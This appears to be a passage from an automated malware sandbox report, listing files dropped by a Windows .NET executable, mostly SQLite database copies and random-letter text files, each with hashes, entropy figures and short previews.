                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):114688
                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98304
                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):98304
                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1026
                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                Malicious:false
                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1026
                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                Malicious:false
                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1026
                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                Malicious:false
                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1026
                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                Malicious:false
                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                Category:dropped
                                                                                                                Size (bytes):106496
                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\VXB84UvyHp.exe
                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                Category:dropped
                                                                                                                Size (bytes):49152
                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                Malicious:false
                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Entropy (8bit):5.960766681316853
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
